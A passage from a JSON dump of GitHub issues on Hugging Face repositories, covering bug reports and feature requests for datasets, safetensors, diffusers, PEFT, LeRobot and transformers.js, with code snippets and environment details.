Sharded Datasets", "body": "### Description\n\nI encountered an inconsistency in behavior between `load_dataset` and `load_from_disk` when loading sharded datasets. Here is a minimal example to reproduce the issue:\n\n#### Code 1: Using `load_dataset`\n```python\nfrom datasets import Dataset, load_dataset\n\n# First save with max_shard_size=10\nDataset.from_dict({\"id\": range(1000)}).train_test_split(test_size=0.1).save_to_disk(\"my_sharded_datasetdict\", max_shard_size=10)\n\n# Second save with max_shard_size=10\nDataset.from_dict({\"id\": range(500)}).train_test_split(test_size=0.1).save_to_disk(\"my_sharded_datasetdict\", max_shard_size=10)\n\n# Load the DatasetDict\nloaded_datasetdict = load_dataset(\"my_sharded_datasetdict\")\nprint(loaded_datasetdict)\n```\n**Output**:\n- `train` has 1350 samples.\n- `test` has 150 samples.\n\n#### Code 2: Using `load_from_disk`\n```python\nfrom datasets import Dataset, load_from_disk\n\n# First save with max_shard_size=10\nDataset.from_dict({\"id\": range(1000)}).train_test_split(test_size=0.1).save_to_disk(\"my_sharded_datasetdict\", max_shard_size=10)\n\n# Second save with max_shard_size=10\nDataset.from_dict({\"id\": range(500)}).train_test_split(test_size=0.1).save_to_disk(\"my_sharded_datasetdict\", max_shard_size=10)\n\n# Load the DatasetDict\nloaded_datasetdict = load_from_disk(\"my_sharded_datasetdict\")\nprint(loaded_datasetdict)\n```\n**Output**:\n- `train` has 450 samples.\n- `test` has 50 samples.\n\n### Expected Behavior\nI expected both `load_dataset` and `load_from_disk` to load the same dataset, as they are pointing to the same directory. However, the results differ significantly:\n- `load_dataset` seems to merge all shards, resulting in a combined dataset.\n- `load_from_disk` only loads the last saved dataset, ignoring previous shards.\n\n### Questions\n1. Is this behavior intentional? If so, could you clarify the difference between `load_dataset` and `load_from_disk` in the documentation?\n2. If this is not intentional, could this be considered a bug?\n3. What is the recommended way to handle cases where multiple datasets are saved to the same directory?\n\n\nThank you for your time and effort in maintaining this great library! I look forward to your feedback.", "url": "https://github.com/huggingface/datasets/issues/7372", "state": "open", "labels": [], "created_at": "2025-01-16T05:47:20Z", "updated_at": "2025-01-16T05:47:20Z", "comments": 0, "user": "gaohongkui" }, { "repo": "huggingface/safetensors", "number": 561, "title": "Feature Request: Support for Ellipsis (...) in Indexing", "body": "### Feature request\n\nThank you very much for your effort in maintaining this great project!\n\nI\u2019m writing to request the addition of support for ellipsis (...) in `safetensor.safe_open` indexing functionality. This would enhance usability and align SafeTensor\u2019s API more closely with the standard Python indexing conventions used in NumPy and PyTorch.\n\n\n### Motivation\n\n## What Does Ellipsis (...) Do?\n\nThe ellipsis (...) is a shorthand in Python indexing that simplifies working with multi-dimensional arrays. It allows users to skip explicitly specifying a subset of dimensions, particularly when dealing with high-dimensional data. For example:\n\n```python\ntensor[..., 0:100, 0:100]\n```\n\nThis indicates that all dimensions up to the last two should be included in their entirety. The `...` is dynamically replaced by as many colons (: or slice(None)) as needed to account for the unspecified dimensions.\n\n### Your contribution\n\nI can do a PR if it is considered relevant.\n\n## Workaround\n\nA class that deals with the key can be used to transform the key into a slice object, which is supported by safetensors.\n\n```python\nfrom typing import Union, Tuple, Any\nfrom itertools import islice\n\nclass SliceTransformer:\n __slots__ = ('ndim',) # Optimize memory usage\n\n def __init__(self, ndim: int):\n if not isinstance(ndim, int) or ndim < 1:\n raise ValueError(\"ndim must be a positive integer\")\n self.ndim = ndim\n\n def transform(self, key: Union[slice, int, Tuple[Any, ...], Any]) -> Tuple[slice, ...]:\n # Handle single key case without tuple conversion\n if isinstance(key, (slice, int)):\n result = [slice(key, key + 1) if isinstance(key, int) else key]\n result.extend(slice(None) for _ in range(self.ndim - 1))\n return tuple(result)\n\n if not isinstance(key, tuple):\n raise TypeError(f\"Unsupported key type: {type(key)}\")\n\n # Pre-allocate result list with known size\n result = []\n result_append = result.append # Local reference for faster access\n \n # Fast path for common case (no ellipsis)\n if Ellipsis not in key:\n for item in islice(key, self.ndim):\n result_append(slice(item, item + 1) if isinstance(item, int) else item)\n result.extend(slice(None) for _ in range(self.ndim - len(result)))\n return tuple(result[:self.ndim])\n\n # Handle ellipsis case\n ellipsis_idx = key.index(Ellipsis)\n remaining_dims = self.ndim - (len(key) - 1)\n \n # Pre-ellipsis items\n for item in islice(key, ellipsis_idx):\n result_append(slice(item, item + 1) if isinstance(item, int) else item)\n \n # Fill ellipsis slots\n result.extend(slice(None) for _ in range(remaining_dims))\n \n # Post-ellipsis items\n for item in islice(key, ellipsis_idx + 1, None):\n if item is Ellipsis:\n raise ValueError(\"Multiple ellipsis found in key\")\n result_append(slice(item, item + 1) if isinstance(item, int) else item)\n\n if len(result) != self.ndim:\n raise ValueError(f\"Key length {len(result)} does not match ndim {self.ndim}\")\n \n return tuple(result)\n\n def __getitem__(self, key):\n return self.transform(key)\n\n\nimport safetensors.numpy\nimport safetensors\ntoy_data = np.random.rand(3, 5, 7, 128, 128)\nsafetensors.numpy.save_file({\"data\": toy_data}, \"model.safetensors\")\n\n# Will not work\nwith safetensors.safe_open(\"model.safetensors\", \"np\") as tensor:\n tensor.get_slice(\"data\")[..., 0:100, 0:200]\n\n# Will work\nwith safetensors.safe_open(\"model.safetensors\", \"np\") as tensor:\n tensor_slice = tensor.get_slice(\"data\")\n tensor_shape = tensor_slice.get_shape()\n new_keys = SliceTransformer(ndim=len(tensor_shape))[..., 0:100, 0:100]\n tensor_slice[new_keys]\n```", "url": "https://github.com/huggingface/safetensors/issues/561", "state": "open", "labels": [], "created_at": "2025-01-14T05:13:54Z", "updated_at": "2025-01-14T05:13:54Z", "comments": 0, "user": "csaybar" }, { "repo": "huggingface/diffusers", "number": 10566, "title": "Unnecessary operations in `CogVideoXTransformer3DModel.forward()`?", "body": "### Describe the bug\n\nHere are few rows of codes in `CogVideoXTransformer3DModel.forward()` :\n```py\n # 3. Transformer blocks\n ...\n\n if not self.config.use_rotary_positional_embeddings:\n # CogVideoX-2B\n hidden_states = self.norm_final(hidden_states)\n else:\n # CogVideoX-5B\n hidden_states = torch.cat([encoder_hidden_states, hidden_states], dim=1)\n hidden_states = self.norm_final(hidden_states)\n hidden_states = hidden_states[:, text_seq_length:]\n\n # 4. Final block\n ...\n```\n\nwhere `self.norm_final` is a `LayerNorm` defined by:\n```py\nself.norm_final = nn.LayerNorm(inner_dim, norm_eps, norm_elementwise_affine)\n```\n\nSince the `normalized_shape` of `self.norm_final` is 1-dimension which means only the last dimension will be normalized, it seems that **the \"cat -> layernorm -> slice\" logic on the 2nd dimension in CogVideoX-5B branch is unnecessary because it does the same thing with**\n```py\nhidden_states = self.norm_final(hidden_states)\n```\n\nThese codes is imported via [PR#9203](https://github.com/huggingface/diffusers/pull/9203/files#diff-6e4d5c6638b71b7a0e7de21357c5b55ffd5ff6373dd1ced70070650855830173R469). @zRzRzRzRzRzRzR @yiyixuxu could you possibly walk me through why these changes were necessary? Thanks a lot for your help!\n\n### Reproduction\n\n.\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n.\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10566", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2025-01-14T04:01:20Z", "updated_at": "2025-02-13T22:11:26Z", "comments": 2, "user": "townwish4git" }, { "repo": "huggingface/diffusers", "number": 10565, "title": "Different generation with `Diffusers` in I2V tasks for LTX-video", "body": "### Describe the bug\n\nHello, I encountered an issue with the generation when attempting the I2V task using `Diffusers`. Is there any difference between the `diffusers` implementation and the `LTX-video-inference scripts` in the I2V task? \n\n- The above is the result from the `inference.py`, and the following is the result generated with `diffuser`.\n- Prompts: `a person`\n\nhttps://github.com/user-attachments/assets/6e2aeeaf-c52b-402c-ae92-aff2d325464b\n\n\nhttps://github.com/user-attachments/assets/59f815ad-1746-4ec5-ae1c-a47dcfa0fd02\n\n\nhttps://github.com/user-attachments/assets/8ca3c79b-8003-4fa2-82b1-8ae17beccb9c\n\n\n\n- test img\n![ref](https://github.com/user-attachments/assets/e3638227-68cf-4510-b380-24071a9409fc)\n\n\nBesides, it seems that the text prompt has a significant impact on the I2V generation with 'diffusers'. Could I be missing any important arguments?\nhttps://huggingface.co/docs/diffusers/api/pipelines/ltx_video\n- results\n\n\nhttps://github.com/user-attachments/assets/c062c21f-5611-4860-ba17-441dd26a8913\n\n\nhttps://github.com/user-attachments/assets/991ec853-ee26-43a7-914b-622d115a9b7f\n\n\nhttps://github.com/user-attachments/assets/ff3e7f04-c17d-4f0a-9aba-2db68aae792d\n\n\nhttps://github.com/user-attachments/assets/f2699759-c36e-4839-bddd-37b84a85e2c7\n\n### Reproduction\n\n- for LTX-video generation\nhttps://github.com/Lightricks/LTX-Video/blob/main/inference.py\n```\npython inference.py \\\n --ckpt_path ./pretrained_models/LTX-Video \\\n --output_path './samples' \\\n --prompt \"A person.\" \\\n --input_image_path ./samples/test_cases.png \\\n --height 512 \\\n --width 512 \\\n --num_frames 49 \\\n --seed 42 \n```\n\n- for diffuser generation: it seems that the negative prompts are causing the issues. However, even when I remove them, the results are still not satisfactory.\n```\nimport argparse\nimport torch\nfrom diffusers import LTXVideoTransformer3DModel\nfrom diffusers import LTXImageToVideoPipeline\nfrom diffusers import FlowMatchEulerDiscreteScheduler, AutoencoderKLLTXVideo\nfrom diffusers.utils import export_to_video, load_image, load_video\n\n\nfrom moviepy import VideoFileClip, AudioFileClip\nimport numpy as np\nfrom pathlib import Path\nimport os\nimport imageio\nfrom einops import rearrange\nfrom PIL import Image\nimport random\n\ndef seed_everething(seed: int):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n\ndef generate_video(args):\n\n pipe = LTXImageToVideoPipeline.from_pretrained(args.ltx_model_path, torch_dtype=torch.bfloat16)\n pipe.to(\"cuda\")\n\n negative_prompt = \"worst quality, inconsistent motion, blurry, jittery, distorted\"\n\n image = load_image(args.validation_image)\n prompt = \"A person.\"\n negative_prompt = \"worst quality, inconsistent motion, blurry, jittery, distorted\"\n generator = torch.Generator(\n device=\"cuda\" if torch.cuda.is_available() else \"cpu\"\n ).manual_seed(42)\n\n video = pipe(\n image=image,\n prompt=prompt,\n guidance_scale=3,\n # stg_scale=1,\n generator=generator,\n callback_on_step_end=None,\n negative_prompt=negative_prompt,\n width=512,\n height=512,\n num_frames=49,\n num_inference_steps=50,\n decode_timestep=0.05,\n decode_noise_scale=0.025,\n\n ).frames[0]\n export_to_video(video, args.output_file, fps=24)\n```\n\n- for demo images with difference text prompts\n https://huggingface.co/docs/diffusers/api/pipelines/ltx_video\n\n```\nimport torch\nfrom diffusers import LTXImageToVideoPipeline\nfrom diffusers.utils import export_to_video, load_image\n\npipe = LTXImageToVideoPipeline.from_pretrained(\"./pretrained_models/LTX-Video\", torch_dtype=torch.bfloat16)\npipe.to(\"cuda\")\n\nimage = load_image(\"samples/image.png\")\nprompt = \"A young girl stands.\"\nnegative_prompt = \"worst quality, inconsistent motion, blurry, jittery, distorted\"\n\nvideo = pipe(\n image=image,\n prompt=prompt,\n negative_prompt=negative_prompt,\n width=704,\n height=480,\n num_frames=161,\n num_inference_steps=50,\n).frames[0]\nmodified_prompt = \"-\".join(prompt.split()[:14])\nexport_to_video(video, f\"samples/test_out/demo-{modified_prompt}.mp4\", fps=24)\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\ntorch 2.4.1\ntorchao 0.7.0\ntorchvision 0.19.1\ndiffusers 0.32.1\npython 3.10\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10565", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2025-01-14T03:24:06Z", "updated_at": "2025-09-09T07:21:31Z", "comments": 11, "user": "Kaihui-Cheng" }, { "repo": "huggingface/transformers.js", "number": 1146, "title": "Why does the local models keep downloading everyday?", "body": "### Question\n\nEvery day when I come back to chat with the local models via transformers.js it downloads the models again. Can't I persisted the downloaded model so that I can chat with them anytime instantly?\nThank you.", "url": "https://github.com/huggingface/transformers.js/issues/1146", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-14T02:56:34Z", "updated_at": "2025-01-18T15:11:09Z", "user": "Nithur-M" }, { "repo": "huggingface/chat-ui", "number": 1646, "title": "Inline audio/video in the output", "body": "If a model returns a markdown content with an image (`![description](url)`), the chat-ui will display the image inline.\nIs there something similar for audio and video? How can a model return audio or video content to the user?\n\nI don't know if this is currently supported or not.\n\n(I'm using the OpenAI endpoint)\n\n\nbtw, tanks a lot for the project, it's very nice!\n", "url": "https://github.com/huggingface/chat-ui/issues/1646", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-01-14T01:20:54Z", "updated_at": "2025-02-28T11:32:48Z", "comments": 1, "user": "laurentlb" }, { "repo": "huggingface/lerobot", "number": 633, "title": "[Question] How to set training to a local dataset?", "body": "Is there a way to train on a local dataset without manually adding the `local_files_only` arg to the `make_dataset` function of the train script?\n\nI have set the `LEROBOT_HOME` env variable. ", "url": "https://github.com/huggingface/lerobot/issues/633", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-01-13T15:27:00Z", "updated_at": "2025-10-08T08:37:55Z", "user": "tlpss" }, { "repo": "huggingface/lerobot", "number": 630, "title": "Removing episodes from LeRobotDataset", "body": "Hi, thanks for building this. It's great.\r\n\r\nIs there a way to easily remove episodes from a dataset. I had a decent amount of diversity in my episodes, and wanted to reduce it, so I had to remove ~1/2 of the episodes. Rather than rerecording them, I wanted to remove specified episodes (lets say all even episodes). Is there an easy way to do this? I'de tried just removing them from the `episodes.jsonl` file, but it seemed to load all of the episodes, and also deleting unwated episode videos/data and renaming the files through some issues when loading the datasets. Is there a better way to do this?", "url": "https://github.com/huggingface/lerobot/issues/630", "state": "closed", "labels": [ "question", "dataset", "stale" ], "created_at": "2025-01-13T01:22:32Z", "updated_at": "2025-10-17T12:07:56Z", "user": "andlyu" }, { "repo": "huggingface/safetensors", "number": 559, "title": "serialize & deserialize does not work as the documentation specify.", "body": "### System Info\n\n- `transformers` version: 4.42.3\r\n- Platform: Linux-6.8.0-51-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.25.2\r\n- Safetensors version: 0.5.2\r\n- Accelerate version: 0.27.0\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.3.1+cu121 (True)\r\n- Tensorflow version (GPU?): 2.15.0 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using distributed or parallel set-up in script?: \r\n- Using GPU in script?: \r\n- GPU type: NVIDIA GeForce RTX 3050 Laptop GPU\r\n\r\n\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Reproduction\n\nHi,\r\n\r\nI\u2019m unsure if this is expected behavior or a bug since it does not align with what the documentation for these functions describes. Below is the code to reproduce the issue:\n\n### Expected behavior\n\n```python\r\nimport numpy as np\r\nimport safetensors\r\nfrom safetensors.numpy import save_file, load\r\n\r\n# Save as a safetensors file\r\ndata_ran_uint16 = np.random.randint(0, 255, (2, 2, 2)).astype(np.uint16)\r\nsave_file({\"toy\": data_ran_uint16}, \"toy.safetensors\")\r\n\r\n# Deserialize the file\r\nwith open(\"toy.safetensors\", \"rb\") as f:\r\n fbytes = safetensors.deserialize(f.read())\r\n\r\n# Expected to work\r\nserialized = safetensors.serialize({\"toy\": fbytes[0][1]})\r\n\r\n# Workaround\r\nfbytes[0][1][\"data\"] = bytes(fbytes[0][1][\"data\"]) # I had to convert the bytearray to bytes\r\nfbytes[0][1][\"dtype\"] = \"uint16\" # I had to change the dtype to uint16\r\nfbytes[0][1][\"shape\"]\r\nserialized = safetensors.serialize({\"toy\": fbytes[0][1]})\r\nload(serialized)\r\n```", "url": "https://github.com/huggingface/safetensors/issues/559", "state": "open", "labels": [], "created_at": "2025-01-12T20:22:57Z", "updated_at": "2025-01-12T20:23:18Z", "comments": 0, "user": "csaybar" }, { "repo": "huggingface/transformers.js", "number": 1142, "title": "Make in-browser WebGPU as seamless as in WebLLM", "body": "### Question\n\nHi there! \ud83d\udc4b\r\n\r\nI've noticed something interesting about WebGPU support in browsers:\r\n\r\n\u2705 [WebLLM's demo](https://chat.webllm.ai/) detects and uses my GPU automatically\r\n\u274c [transformers.js examples](https://huggingface.co/spaces/Xenova/nanollava-1.5-webgpu) fail with:\r\n```Error: no available backend found. ERR: [webgpu] TypeError: e.requestAdapterInfo is not a function```\r\n\r\nThis ease-of-use difference matters a lot for adoption. I believe reducing friction in GPU setup is crucial for adoption of in-browser ML models - when users need to modify browser settings or follow additional configuration steps, it can significantly impact their willingness to try new applications. WebLLM shows that seamless GPU detection is possible for in-browser ML models.\r\n\r\nEnvironment:\r\n- Chrome 131.0.6778.205\r\n- macOS\r\n\r\nCould transformers.js adopt a similar approach to WebLLM for automatic GPU detection? Happy to provide more details if needed!\r\n\r\nBest regards", "url": "https://github.com/huggingface/transformers.js/issues/1142", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-12T15:06:17Z", "updated_at": "2025-01-27T11:45:03Z", "user": "Anna-iroro" }, { "repo": "huggingface/peft", "number": 2322, "title": "model merge and unload feature for AdaLora", "body": "### Feature request\n\nunlike Lora or IA3 adapter type, AdaLora does not provide a method to merge lora adapter weights into original weights so that it can be used as a standalone model. I made that feature for a personal usecase and want to make a PR to make this feature accessible to everyone. \n\n### Motivation\n\nThis feature makes people easily merge AdaLora adapter weights into original weights, which makes further finetuning on it possible (i.e. when one wants to resume adalora training for checkpoints that was already trained with adalora, resuming training is not possible with unmerged weights. )\n\n### Your contribution\n\nI'll submit a PR. I followed the example of IA3 `merge_and_unload`\r\n\r\nFollowing is the overview of change : \r\n\r\n```\r\n def _unload_and_optionally_merge(\r\n self,\r\n merge: bool = True,\r\n safe_merge: bool = False,\r\n adapter_names: Optional[list[str]] = None,\r\n eps: float = 1e-5\r\n ) -> torch.nn.Module:\r\n \"\"\"\r\n This method unloads the AdaLoRA adapter modules and optionally merges them into the base model weights.\r\n \r\n Args:\r\n merge (`bool`, defaults to `True`):\r\n If True, merges the adapter weights into base model weights. \r\n If False, it will only unload the adapters without merging.\r\n safe_merge (`bool`, defaults to `False`):\r\n If True, performs the merge operation with extra safety checks.\r\n adapter_names (`List[str]`, *optional*):\r\n The list of adapter names to merge. If None, all active adapters will be merged.\r\n eps (`float`, defaults to 1e-5):\r\n Small constant for numerical stability when dividing by ranknum.\r\n \r\n Returns:\r\n model (`torch.nn.Module`):\r\n The resulting PyTorch model.\r\n \"\"\"\r\n if getattr(self.model, \"is_loaded_in_8bit\", False):\r\n raise ValueError(\"Cannot merge adalora layers when the model is loaded in 8-bit mode\")\r\n\r\n if getattr(self.model, \"is_loaded_in_4bit\", False):\r\n raise ValueError(\"Cannot merge adalora layers when the model is loaded in 4-bit mode\")\r\n \r\n if adapter_names is not None:\r\n raise ValueError(\"AdaLoRA does not support merging specific adapters. Got adapter_names={adapter_names}\")\r\n\r\n # Create a copy of the base model state dict to modify\r\n original_state_dict = self.model.state_dict()\r\n\r\n if merge:\r\n for name, module in self.model.named_modules():\r\n if hasattr(module, \"base_layer\") and hasattr(module, \"lora_A\"):\r\n # Extract base layer weight name\r\n layer_name = name.replace(\".lora_A\", \"\")\r\n layer_name = layer_name.replace(\"base_model.model.\", \"\")\r\n base_weight_name = f\"{layer_name}.weight\"\r\n\r\n # Get SVD parameters\r\n lora_A = module.lora_A[\"default\"] # [r x d_in]\r\n lora_B = module.lora_B[\"default\"] # [d_out x r]\r\n lora_E = module.lora_E[\"default\"] # [r x 1]\r\n \r\n # Calculate active ranks\r\n ranknum = (lora_E != 0).sum()\r\n scaling = module.scaling[\"default\"] if hasattr(module, \"scaling\") else 16\r\n\r\n # Safety check if requested\r\n if safe_merge and (torch.isnan(lora_A).any() or torch.isnan(lora_B).any() or torch.isnan(lora_E).any()):\r\n raise ValueError(f\"NaN detected in adapter weights for layer {name}\")\r\n\r\n # Scale A with E: A' = AE\r\n scaled_A = lora_A * lora_E # [r x d_in]\r\n\r\n # Compute update: \u0394W = BA'\r\n if ranknum > 0:\r\n update = (lora_B @ scaled_A) * scaling / (ranknum + eps)\r\n else:\r\n update = torch.zeros_like(original_state_dict[base_weight_name])\r\n\r\n # Update base weights\r\n if base_weight_name in original_state_dict:\r\n original_state_dict[base_weight_name] += update\r\n\r\n # Load the merged state dict back into a clean version of the model\r\n self.model.load_state_dict(original_state_dict)\r\n\r\n return self.model\r\n\r\n def merge_and_unload(\r\n self, \r\n safe_merge: bool = False, \r\n adapter_names: Optional[list[str]] = None,\r\n eps: float = 1e-5\r\n ) -> torch.nn.Module:\r\n \"\"\"\r\n Merge the active adapters into the base model and unload the adapters.\r\n \r\n Args:\r\n safe_merge (`bool`, defaults to `False`):\r\n If True, performs the merge operation with extra safety checks.\r\n adapter_names (`List[str]`, *optional*):\r\n List of adapter names to merge. If None, merges all active adapters.\r\n eps (`floa", "url": "https://github.com/huggingface/peft/issues/2322", "state": "closed", "labels": [], "created_at": "2025-01-12T09:20:01Z", "updated_at": "2025-01-14T12:47:35Z", "comments": 6, "user": "DaehanKim" }, { "repo": "huggingface/sentence-transformers", "number": 3166, "title": "How to report a security issue responsibly?", "body": "I have just found a potential security issue in the repo and want to know how I can report it to your team privately, thanks!", "url": "https://github.com/huggingface/sentence-transformers/issues/3166", "state": "closed", "labels": [], "created_at": "2025-01-12T04:24:15Z", "updated_at": "2025-01-12T08:52:43Z", "user": "zpbrent" }, { "repo": "huggingface/datasets", "number": 7365, "title": "A parameter is specified but not used in datasets.arrow_dataset.Dataset.from_pandas()", "body": "### Describe the bug\n\nI am interested in creating train, test and eval splits from a pandas Dataframe, therefore I was looking at the possibilities I can follow. I noticed the split parameter and was hopeful to use it in order to generate the 3 at once, however, while trying to understand the code, i noticed that it has no added value (correct me if I am wrong or misunderstood the code). \r\n\r\n\r\nfrom_pandas function code :\r\n\r\n```python\r\n if info is not None and features is not None and info.features != features:\r\n raise ValueError(\r\n f\"Features specified in `features` and `info.features` can't be different:\\n{features}\\n{info.features}\"\r\n )\r\n features = features if features is not None else info.features if info is not None else None\r\n if info is None:\r\n info = DatasetInfo()\r\n info.features = features\r\n table = InMemoryTable.from_pandas(\r\n df=df,\r\n preserve_index=preserve_index,\r\n )\r\n if features is not None:\r\n # more expensive cast than InMemoryTable.from_pandas(..., schema=features.arrow_schema)\r\n # needed to support the str to Audio conversion for instance\r\n table = table.cast(features.arrow_schema)\r\n return cls(table, info=info, split=split)\r\n```\n\n### Steps to reproduce the bug\n\n```python\r\nfrom datasets import Dataset\r\n# Filling the split parameter with whatever causes no harm at all\r\ndata = Dataset.from_pandas(self.raw_data, split='egiojegoierjgoiejgrefiergiuorenvuirgurthgi')\r\n```\n\n### Expected behavior\n\nWould be great if there is no split parameter (if it isn't working), or to add a concrete example of how it can be used.\n\n### Environment info\n\n- `datasets` version: 3.2.0\r\n- Platform: Linux-5.15.0-127-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- `huggingface_hub` version: 0.27.1\r\n- PyArrow version: 18.1.0\r\n- Pandas version: 2.2.3\r\n- `fsspec` version: 2024.9.0", "url": "https://github.com/huggingface/datasets/issues/7365", "state": "open", "labels": [], "created_at": "2025-01-10T13:39:33Z", "updated_at": "2025-01-10T13:39:33Z", "comments": 0, "user": "NourOM02" }, { "repo": "huggingface/peft", "number": 2319, "title": "Import error , is it a version issue?", "body": "### System Info\n\nWhen I execute the finetune.py file, an error occurs as follows: cannot import name 'prepare_model_for_int8_training'.Is it a version issue? My version is 0.14.0.\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\ncannot import name 'prepare_model_for_int8_training' from 'peft' (/path/python3.10/site-packages/peft/__init__.py)\n\n### Expected behavior\n\nWho can help me answer this question\uff0cthks", "url": "https://github.com/huggingface/peft/issues/2319", "state": "closed", "labels": [], "created_at": "2025-01-10T02:34:52Z", "updated_at": "2025-01-13T10:13:18Z", "comments": 3, "user": "zhangyangniubi" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 138, "title": "entrypoint.sh for TGI does not implemented requirements.txt installation process", "body": "Hello team,\r\n\r\nLike this sample, https://github.com/huggingface/Google-Cloud-Containers/blob/main/containers/pytorch/inference/gpu/2.3.1/transformers/4.46.1/py311/entrypoint.sh\r\n\r\nThe entrypoint needs requirements.txt provisioning process.\r\n\r\nBut in this TGI sample does not contains these procedure.\r\nhttps://github.com/huggingface/Google-Cloud-Containers/blob/main/containers/tgi/gpu/3.0.1/entrypoint.sh\r\n\r\nIs it missing or handled by text_generation_launcher process internally ?", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/138", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-09T08:09:14Z", "updated_at": "2025-01-21T07:44:52Z", "user": "jk1333" }, { "repo": "huggingface/lerobot", "number": 623, "title": "Why different dimensionality state tensor with n_obs_steps vs not?", "body": "Curious about a design decision - why not have ACT with a [batch, n_obs_steps, state_dim] tensor but assert that n_obs_steps is length 1? Instead of [batch, state_dim]\r\n\r\nCurrently, we have to detect different dimensionality and handle when we're writing policy-agnostic code", "url": "https://github.com/huggingface/lerobot/issues/623", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2025-01-08T18:16:51Z", "updated_at": "2025-10-19T02:32:27Z", "user": "genemerewether" }, { "repo": "huggingface/diffusers", "number": 10496, "title": "NF4 quantized flux models with loras", "body": "Is there any update here ? With nf4 quantized flux models, i could not use any lora \r\n\r\n> **Update**: NF4 serialization and loading are working fine. @DN6 let's brainstorm how we can support it more easily? This would help us unlock doing LoRAs on the quantized weights, too (cc: @BenjaminBossan for PEFT). I think this will become evidently critical for larger models. \r\n> \r\n> `transformers` has a nice reference for us to follow. Additionally, `accelerate` has: https://huggingface.co/docs/accelerate/en/usage_guides/quantization, but it doesn't support NF4 serialization yet.\r\n> \r\n> Cc: @SunMarc for jamming on this together.\r\n> \r\n> _Originally posted by @sayakpaul in https://github.com/huggingface/diffusers/issues/9165#issuecomment-2287694518_\r\n> ", "url": "https://github.com/huggingface/diffusers/issues/10496", "state": "closed", "labels": [], "created_at": "2025-01-08T11:41:01Z", "updated_at": "2025-01-13T19:42:03Z", "comments": 12, "user": "hamzaakyildiz" }, { "repo": "huggingface/diffusers", "number": 10489, "title": "Bug in SanaPipeline example?", "body": "### Describe the bug\r\n\r\nI think there might be something wrong with the `SanaPipeline` example code at https://huggingface.co/docs/diffusers/main/en/api/pipelines/sana#diffusers.SanaPipeline\r\nIt results in a shape mismatch (see detailed logs below): `mat1 and mat2 shapes cannot be multiplied (600x256000 and 2304x1152)`\r\n \r\nI've noticed that the `text_encoder` model looks different depending on the way it is loaded. \r\n* If I **load it with the official example code** (=code in `Reproduction`), `pipeline.text_encoder` looks like this:\r\n```\r\nGemma2ForCausalLM(\r\n (model): Gemma2Model(\r\n (embed_tokens): Embedding(256000, 2304, padding_idx=0)\r\n (layers): ModuleList(\r\n (0-25): 26 x Gemma2DecoderLayer(\r\n (self_attn): Gemma2Attention(\r\n (q_proj): Linear(in_features=2304, out_features=2048, bias=False)\r\n (k_proj): Linear(in_features=2304, out_features=1024, bias=False)\r\n (v_proj): Linear(in_features=2304, out_features=1024, bias=False)\r\n (o_proj): Linear(in_features=2048, out_features=2304, bias=False)\r\n (rotary_emb): Gemma2RotaryEmbedding()\r\n )\r\n (mlp): Gemma2MLP(\r\n (gate_proj): Linear(in_features=2304, out_features=9216, bias=False)\r\n (up_proj): Linear(in_features=2304, out_features=9216, bias=False)\r\n (down_proj): Linear(in_features=9216, out_features=2304, bias=False)\r\n (act_fn): PytorchGELUTanh()\r\n )\r\n (input_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n (pre_feedforward_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n (post_feedforward_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n (post_attention_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n )\r\n )\r\n (norm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n )\r\n (lm_head): Linear(in_features=2304, out_features=256000, bias=False)\r\n)\r\n```\r\n\r\nIf however I **don't load the components separately** but with the code provided by @lawrence-cj [here](https://github.com/huggingface/diffusers/issues/10334#issuecomment-2558359268) it 1) works and 2) the `text_encoder` looks different:\r\n\r\n```\r\nGemma2Model(\r\n (embed_tokens): Embedding(256000, 2304, padding_idx=0)\r\n (layers): ModuleList(\r\n (0-25): 26 x Gemma2DecoderLayer(\r\n (self_attn): Gemma2Attention(\r\n (q_proj): Linear(in_features=2304, out_features=2048, bias=False)\r\n (k_proj): Linear(in_features=2304, out_features=1024, bias=False)\r\n (v_proj): Linear(in_features=2304, out_features=1024, bias=False)\r\n (o_proj): Linear(in_features=2048, out_features=2304, bias=False)\r\n (rotary_emb): Gemma2RotaryEmbedding()\r\n )\r\n (mlp): Gemma2MLP(\r\n (gate_proj): Linear(in_features=2304, out_features=9216, bias=False)\r\n (up_proj): Linear(in_features=2304, out_features=9216, bias=False)\r\n (down_proj): Linear(in_features=9216, out_features=2304, bias=False)\r\n (act_fn): PytorchGELUTanh()\r\n )\r\n (input_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n (pre_feedforward_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n (post_feedforward_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n (post_attention_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n )\r\n )\r\n (norm): Gemma2RMSNorm((2304,), 